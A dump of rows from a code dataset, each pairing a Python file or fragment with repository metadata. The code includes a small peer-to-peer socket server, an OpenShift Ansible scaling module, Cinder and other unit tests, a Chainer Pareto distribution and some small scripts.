subprocess.Popen(['kill', '-9', pid])
def serve_forever(message_handler_func, PORT, queue):
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', PORT))
server.listen(100)
while True:
client, addr = server.accept()
(ip, port) = addr
data = client.recv(MAX_MESSAGE_SIZE)
#we could insert security checks here
try:
|
data=tools.unpackage(data)
|
client.send(tools.package(message_handler_func(data, queue)))
except: pass
def connect(msg, host, port):
if len(msg)<1 or len(msg)>MAX_MESSAGE_SIZE:
print('wrong sized message')
return
s = socket.socket()
try:
s.settimeout(4)
s.connect((str(host), int(port)))
msg['version']=custom.version
s.send(tools.package(msg))
response = s.recv(MAX_MESSAGE_SIZE)
#print(response)
return tools.unpackage(response)
except Exception as e:
#print('THE ERROR WAS: ' +str(e))
#print('disconnect')
return {'error':e}
def send_command(peer, msg): return connect(msg, peer[0], peer[1])
|
sosiouxme/openshift-ansible
|
roles/lib_openshift/library/oc_scale.py
|
Python
|
apache-2.0
| 66,630
| 0.001291
|
#!/usr/bin/env python
# pylint: disable=missing-docstring
# flake8: noqa: T001
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
#
# Copyright 2016 Red Hat, Inc. and/or its affiliates
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance wit
|
h the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is d
|
istributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- -*- -*- Begin included fragment: lib/import.py -*- -*- -*-
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
from __future__ import print_function
import atexit
import copy
import fcntl
import json
import time
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
try:
import ruamel.yaml as yaml
except ImportError:
import yaml
from ansible.module_utils.basic import AnsibleModule
# -*- -*- -*- End included fragment: lib/import.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: doc/scale -*- -*- -*-
DOCUMENTATION = '''
---
module: oc_scale
short_description: Manage openshift services through the scale parameters
description:
- Manage openshift services through scaling them.
options:
state:
description:
- State represents whether to scale or list the current replicas
required: true
default: present
choices: ["present", "list"]
aliases: []
kubeconfig:
description:
- The path for the kubeconfig file to use for authentication
required: false
default: /etc/origin/master/admin.kubeconfig
aliases: []
debug:
description:
- Turn on debug output.
required: false
default: False
aliases: []
name:
description:
- Name of the object that is being queried.
required: false
default: None
aliases: []
namespace:
description:
- The namespace where the object lives.
required: false
default: default
aliases: []
kind:
description:
- The kind of object to scale.
required: false
default: None
choices:
- rc
- dc
aliases: []
author:
- "Kenny Woodson <kwoodson@redhat.com>"
extends_documentation_fragment: []
'''
EXAMPLES = '''
- name: scale down a rc to 0
oc_scale:
name: my-replication-controller
kind: rc
namespace: openshift-infra
replicas: 0
- name: scale up a deploymentconfig to 2
oc_scale:
name: php
kind: dc
namespace: my-php-app
replicas: 2
'''
# -*- -*- -*- End included fragment: doc/scale -*- -*- -*-
# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
class YeditException(Exception): # pragma: no cover
''' Exception class for Yedit '''
pass
# pylint: disable=too-many-public-methods,too-many-instance-attributes
class Yedit(object): # pragma: no cover
''' Class to modify yaml files '''
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z{}/_-]+)"
com_sep = set(['.', '#', '|', ':'])
# pylint: disable=too-many-arguments
def __init__(self,
filename=None,
content=None,
content_type='yaml',
separator='.',
backup_ext=None,
backup=False):
self.content = content
self._separator = separator
self.filename = filename
self.__yaml_dict = content
self.content_type = content_type
self.backup = backup
if backup_ext is None:
self.backup_ext = ".{}".format(time.strftime("%Y%m%dT%H%M%S"))
else:
self.backup_ext = backup_ext
self.load(content_type=self.content_type)
if self.__yaml_dict is None:
self.__yaml_dict = {}
@property
def separator(self):
''' getter method for separator '''
return self._separator
@separator.setter
def separator(self, inc_sep):
''' setter method for separator '''
self._separator = inc_sep
@property
def yaml_dict(self):
''' getter method for yaml_dict '''
return self.__yaml_dict
@yaml_dict.setter
def yaml_dict(self, value):
''' setter method for yaml_dict '''
self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key.format(''.join(common_separators)), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key.format(''.join(common_separators)), key):
return False
return True
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def remove_entry(data, key, index=None, value=None, sep='.'):
''' remove data at location key '''
if key == '' and isinstance(data, dict):
if value is not None:
data.pop(value)
elif index is not None:
raise YeditException("remove_entry for a dictionary does not have an index {}".format(index))
else:
data.clear()
return True
elif key == '' and isinstance(data, list):
ind = None
if value is not None:
try:
ind = data.index(value)
except ValueError:
return False
elif index is not None:
ind = index
else:
del data[:]
if ind is not None:
data.pop(ind)
return True
if not (key and Yedit.valid_key(key, sep)) and \
isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
# process last index for remove
# expected list entry
if key_indexes[-1][0]:
if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
del data[int(key_indexes[-1][0])]
return True
# expected dict entry
elif key_indexes[-1][1]:
if isinstance(data, dict):
del data[key_indexes[-1][1]]
return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a#b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key:
if isinstance(data, dict) and dict_key in data and data[dict_key]: # noqa: E501
data = data[dict_key]
continue
elif data and not isinstance(data, dict
|
Valentijn1995/Kn0ckKn0ck
|
Kn0ckKn0ckTestSuite.py
|
Python
|
mit
| 1,092
| 0.000916
|
from unittest import TestLoader, TextTestRunner, TestSuite
from UnitTests.TableTest import TestTable
from UnitTests.DestinationTest import TestDestination
from UnitTests.CSVReaderTest import TestCSVReader
from UnitTests.ProxyExtractorTest import TestProxyExtractor
from UnitTests.NoProtocolTest import TestNoProtocol
from UnitTests.HttpProtocolTest import TestHttpProtocol
from UnitTests.ProxyTest import TestProxy
def run_tests():
suite_list = []
suite_list.append(TestLoader().loadTestsFromTestCase(TestTable))
suite_list.append(TestLoader().loadTestsFromTestCase(TestDestination))
s
|
uite_list.append(TestLoader().loadTestsFromTestCase(TestCSVReader))
suite_list.append(TestLoader().loadTestsFromTestCase(TestProxyE
|
xtractor))
suite_list.append(TestLoader().loadTestsFromTestCase(TestNoProtocol))
suite_list.append(TestLoader().loadTestsFromTestCase(TestHttpProtocol))
suite_list.append(TestLoader().loadTestsFromTestCase(TestProxy))
suite = TestSuite(suite_list)
TextTestRunner(verbosity=2).run(suite)
if __name__ == "__main__":
run_tests()
|
rakeshmi/cinder
|
cinder/tests/unit/test_volume_types_extra_specs.py
|
Python
|
apache-2.0
| 5,074
| 0
|
# Copyright (c) 2011 Zadara Storage Inc.
# Copyright (c) 2011 OpenStack Foundation
# Copyright 2011 University of Southern California
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, softw
|
are
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language govern
|
ing permissions and limitations
# under the License.
"""
Unit Tests for volume types extra specs code
"""
from cinder import context
from cinder import db
from cinder import test
class VolumeTypeExtraSpecsTestCase(test.TestCase):
def setUp(self):
super(VolumeTypeExtraSpecsTestCase, self).setUp()
self.context = context.get_admin_context()
self.vol_type1 = dict(name="TEST: Regular volume test")
self.vol_type1_specs = dict(vol_extra1="value1",
vol_extra2="value2",
vol_extra3=3)
self.vol_type1['extra_specs'] = self.vol_type1_specs
ref = db.volume_type_create(self.context, self.vol_type1)
self.addCleanup(db.volume_type_destroy, context.get_admin_context(),
self.vol_type1['id'])
self.volume_type1_id = ref.id
for k, v in self.vol_type1_specs.iteritems():
self.vol_type1_specs[k] = str(v)
self.vol_type2_noextra = dict(name="TEST: Volume type without extra")
ref = db.volume_type_create(self.context, self.vol_type2_noextra)
self.addCleanup(db.volume_type_destroy, context.get_admin_context(),
self.vol_type2_noextra['id'])
self.vol_type2_id = ref.id
def test_volume_type_specs_get(self):
expected_specs = self.vol_type1_specs.copy()
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_extra_specs_delete(self):
expected_specs = self.vol_type1_specs.copy()
del expected_specs['vol_extra2']
db.volume_type_extra_specs_delete(context.get_admin_context(),
self.volume_type1_id,
'vol_extra2')
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_extra_specs_update(self):
expected_specs = self.vol_type1_specs.copy()
expected_specs['vol_extra3'] = "4"
db.volume_type_extra_specs_update_or_create(
context.get_admin_context(),
self.volume_type1_id,
dict(vol_extra3=4))
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_extra_specs_create(self):
expected_specs = self.vol_type1_specs.copy()
expected_specs['vol_extra4'] = 'value4'
expected_specs['vol_extra5'] = 'value5'
db.volume_type_extra_specs_update_or_create(
context.get_admin_context(),
self.volume_type1_id,
dict(vol_extra4="value4",
vol_extra5="value5"))
actual_specs = db.volume_type_extra_specs_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(expected_specs, actual_specs)
def test_volume_type_get_with_extra_specs(self):
volume_type = db.volume_type_get(
context.get_admin_context(),
self.volume_type1_id)
self.assertEqual(volume_type['extra_specs'], self.vol_type1_specs)
volume_type = db.volume_type_get(
context.get_admin_context(),
self.vol_type2_id)
self.assertEqual(volume_type['extra_specs'], {})
def test_volume_type_get_by_name_with_extra_specs(self):
volume_type = db.volume_type_get_by_name(
context.get_admin_context(),
self.vol_type1['name'])
self.assertEqual(volume_type['extra_specs'], self.vol_type1_specs)
volume_type = db.volume_type_get_by_name(
context.get_admin_context(),
self.vol_type2_noextra['name'])
self.assertEqual(volume_type['extra_specs'], {})
def test_volume_type_get_all(self):
expected_specs = self.vol_type1_specs.copy()
types = db.volume_type_get_all(context.get_admin_context())
self.assertEqual(
types[self.vol_type1['name']]['extra_specs'], expected_specs)
self.assertEqual(
types[self.vol_type2_noextra['name']]['extra_specs'], {})
|
ktnyt/chainer
|
chainer/distributions/pareto.py
|
Python
|
mit
| 3,069
| 0
|
import chainer
from chainer.backends import cuda
from chainer import distribution
from chainer.functions.array import where
from chainer.functions.math import exponential
from chainer import utils
class Pareto(distribution.Distribution):
"""Pareto Distribution.
.. math::
f(x) = \\alpha x_m^{\\alpha}(x)^{-(\\alpha+1)},
Args:
scale(:class:`~chainer.Variable` or :ref:`ndarray`): Parameter of
distribution :math:`x_m`.
alpha(:class:`~chainer.Variable` or :ref:`ndarray`): Parameter of
distribution :math:`\\alpha`.
"""
def __init__(self, scale, alpha):
super(Pareto, self).__init__()
self.__scale = chainer.as_variable(scale)
self.__alpha = chainer.as_variable(alpha)
@property
def scale(self):
return self.__scale
@property
def alpha(self):
return self.__alpha
@property
def batch_shape(self):
return self.scale.shape
@property
def entropy(self):
return - exponential.log(self.alpha) + exponential.log(self.scale) \
+ 1. / self.alpha + 1.
@property
|
def event_shape(self):
return ()
@property
def _is_gpu(self):
return isinstance(self.scale.data, cuda.ndarray)
def log_prob(self, x):
x = chainer.as_variable(x)
logp = exponential.log(self.alpha) \
+ self.alpha * exponential.log
|
(self.scale) \
- (self.alpha + 1) * exponential.log(x)
xp = logp.xp
return where.where(
utils.force_array(x.data >= self.scale.data),
logp, xp.array(-xp.inf, logp.dtype))
@property
def mean(self):
mean = (self.alpha * self.scale / (self.alpha - 1))
xp = mean.xp
return where.where(
self.alpha.data > 1,
mean, xp.array(xp.inf, mean.dtype))
def sample_n(self, n):
xp = cuda.get_array_module(self.scale)
if xp is cuda.cupy:
eps = xp.random.pareto(
self.alpha.data, (n,)+self.batch_shape, dtype=self.alpha.dtype)
else:
eps = xp.random.pareto(
self.alpha.data, (n,)+self.batch_shape
).astype(self.alpha.dtype)
noise = self.scale * (eps + 1)
return noise
@property
def support(self):
return '[scale, inf]'
@property
def variance(self):
var = self.scale ** 2 * self.alpha / (self.alpha - 1) ** 2 \
/ (self.alpha - 2)
xp = var.xp
return where.where(
self.alpha.data > 2,
var, xp.array(xp.inf, var.dtype))
@distribution.register_kl(Pareto, Pareto)
def _kl_pareto_pareto(dist1, dist2):
kl = dist2.alpha * (exponential.log(dist1.scale)
- exponential.log(dist2.scale)) \
+ exponential.log(dist1.alpha) - exponential.log(dist2.alpha) \
+ (dist2.alpha - dist1.alpha) / dist1.alpha
xp = kl.xp
return where.where(
dist1.scale.data >= dist2.scale.data,
kl, xp.array(xp.inf, kl.dtype))
|
SafeW3rd/Ciphers
|
password.py
|
Python
|
mit
| 179
| 0.005587
|
print('What is the password?'
|
)
password = input()
if password == 'rosebud':
print('Access granted.')
if password != 'rosebud':
p
|
rint('Access denied.')
print('Done.')
|
sunj1/my_pyforms
|
pyforms/Utils/timeit.py
|
Python
|
mit
| 694
| 0.034582
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = "Ricardo Ribeiro"
__credits__ = ["Ricardo Ribeiro"]
__license__ = "MIT"
__version__ = "0.0"
__maintainer__ = "Ricardo Ribeiro"
__email__ = "ricardojvr@gmail.com"
__status__ = "Development"
|
import time
from datetime import datetime, timedelta
def timeit(method):
def timed(*args, **kw):
ts = time.time()
result = method(*args, **kw)
te = time.time()
time_elapsed = datetime(1,1,1) + timedelta(seconds=(te-ts) )
print("%s: %d:%d:%d:%d;%d" % (method.__name__, time_elapsed.day-1, time_elapsed.hour, time_elapsed.minute, time_elapsed.second, time_elapsed.microsecond))
return resu
|
lt
return timed
|
clancia/TASEP
|
Sequential_TASEP/LinRegCTvsSize.py
|
Python
|
gpl-2.0
| 2,328
| 0.018041
|
import matplotlib.pyplot as plt
import numpy as np
from glob import glob
from scipy import stats
#p = 0.5
e = 0.1
qth = [25,50,75,90]
nomefile = './N*' + '_B*' + '_p=1su2L_e0.0.npy'
nomefile = glob(nomefile)
data = []
N = []
medie = []
mediane = []
massimi = []
perc = []
nomefile.sort(key=lambda x:int(x.split('_')[1][1:]))
'''
questo sort e' la ostia, Carlo tu avevi dimenticato l'int() e non
funzionava!
'''
for f in nomefile:
N.append(2*int(f.split('_')[1][1:]))
data.append(np.load(f))
medie.append(np.mean(data[-1]))
massimi.append(max(data[-1]))
mediane.append(np.median(data[-1]))
perc.append(np.percentile(data[-1], qth))
perc = np.array(perc)
perc= perc.T
xi = np.zeros(len(N))
for i in range(len(N)):
xi[i] = N[i] - 10
Eslope, Eintercept, Er_value, Ep_value, Estd_err = stats.linregress(xi, medie)
Mslope, Mintercept, Mr_value, Mp_value, Mstd_err = stats.linregress(xi, massimi)
MEDslope, MEDintercept, MEDr_value, MEDp_value, Mstd_err = stats.linregress(xi, mediane)
fig, (ax, bx, cx) = plt.subplots(ncols=3)
fig.suptitle('Coalescence Times for Parallel TASEP p=1/2L e=0.0', fontsize=18)
Eline = Eslope*xi + Eintercept
MEDline = MEDslope*xi + MED
|
intercept
Mline = Mslope*xi + Mintercept
ax.plot(N,Eline,'r-',N,med
|
ie,'o')
ax.set_ylabel('Mean of Coalescence Times', fontsize=15)
ax.set_xlabel('Number of Sites of the Ring')
ax.text(15,35, 'Slope = %f \nIntercept = %f' %(Eslope, Eintercept), fontsize=16)
bx.plot(N,MEDline,'r-',N,mediane,'x')
bx.set_ylabel('Median of Coalescence Times', fontsize=15)
bx.set_xlabel('Number of Sites of the Ring')
bx.text(15, 15, 'Slope = %f \nIntercept = %f' %(MEDslope, MEDintercept), fontsize=16)
cx.plot(N,Mline,'r-',N,massimi,'g^')
cx.text(15, 1000, 'Slope = %f \nIntercept = %f' %(Mslope, Mintercept), fontsize=16)
cx.set_ylabel('Max of Coalescence Times', fontsize=15)
cx.set_xlabel('Number of Sites of the Ring')
plt.show()
fig = plt.figure()
# for row, lab in zip(perc[::-1],qth[::-1]):
# plt.plot(N,row, label=lab)
# '''
# ho usato la extended slice syntax solo per avere la legenda in ordine decrescente
# '''
# plt.legend(loc=2, title= 'Percentiles')
# plt.ylabel('Values of Percentiles of Coalescence Times')
# plt.xlabel('Number of Sites of the Ring')
# plt.title('Percentiles of Coealescence Times of Parallel TASEP p0.5 e0.1')
# plt.show(fig)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.